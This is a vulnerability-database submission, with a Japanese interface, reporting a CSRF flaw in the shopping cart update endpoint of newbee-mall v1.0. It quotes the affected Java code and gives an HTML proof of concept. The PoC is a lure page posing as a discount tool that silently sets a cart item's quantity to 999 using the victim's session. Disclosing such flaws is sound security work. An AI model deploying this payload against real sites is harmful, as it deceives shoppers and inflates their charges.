| タイトル | newbee-ltd newbee-mall v1.0 CSRF |
|---|
| 説明 | # CSRF Vulnerability in Shopping Cart Item Update
## Summary
A **CSRF vulnerability** exists in the shopping cart update endpoint `/shop-cart` (PUT). Attackers can modify the quantity of items in users' shopping carts, potentially increasing order values significantly.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
public void addInterceptors(InterceptorRegistry registry) {
registry.addInterceptor(newBeeMallLoginInterceptor)
.addPathPatterns("/shop-cart/**");
// ❌ No CSRF protection
}
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/ShoppingCartController.java` (Lines 78-91)
```java
@PutMapping("/shop-cart")
@ResponseBody
public Result updateNewBeeMallShoppingCartItem(@RequestBody NewBeeMallShoppingCartItem newBeeMallShoppingCartItem,
HttpSession httpSession) {
NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
newBeeMallShoppingCartItem.setUserId(user.getUserId());
// ❌ No CSRF token validation
// ⚠️ Allows modification of item quantities without authorization
String updateResult = newBeeMallShoppingCartService.updateNewBeeMallCartItem(newBeeMallShoppingCartItem);
if (ServiceResultEnum.SUCCESS.getResult().equals(updateResult)) {
return ResultGenerator.genSuccessResult();
}
return ResultGenerator.genFailResult(updateResult);
}
```
**Security Issues**:
1. ❌ No CSRF token validation
2. ⚠️ Can drastically increase item quantities
3. ⚠️ Leads to inflated order values
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>Cart Optimization</title>
</head>
<body>
<h2>???? Optimizing your shopping cart...</h2>
<p>Please wait while we apply discounts.</p>
<script>
// Increase quantity of all cart items to maximum
fetch('http://localhost:28089/shop-cart', {
method: 'PUT',
credentials: 'include',
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify({
cartItemId: 1, // Target cart item
goodsCount: 999, // Set to maximum quantity
goodsId: 10001
})
})
.then(response => response.json())
.then(data => {
document.body.innerHTML = '<h3>✅ Cart optimized!</h3>';
});
</script>
</body>
</html>
```
## Impact
**Shopping cart manipulation leading to inflated charges** - Users may unknowingly checkout with drastically increased item quantities, resulting in unexpected high charges.
---
**CVSS Score**: 7.1 (High)
|
|---|
| ソース | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/111 |
|---|
| ユーザー | flashzyc (UID 92850) |
|---|
| 送信 | 2026年02月05日 11:55 (4 月 ago) |
|---|
| モデレーション | 2026年02月18日 07:56 (13 days later) |
|---|
| ステータス | 重複 |
|---|
| VulDBエントリ | 346456 [newbee-ltd newbee-mall 迄 a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints クロスサイトリクエストフォージェリ] |
|---|
| ポイント | 0 |
|---|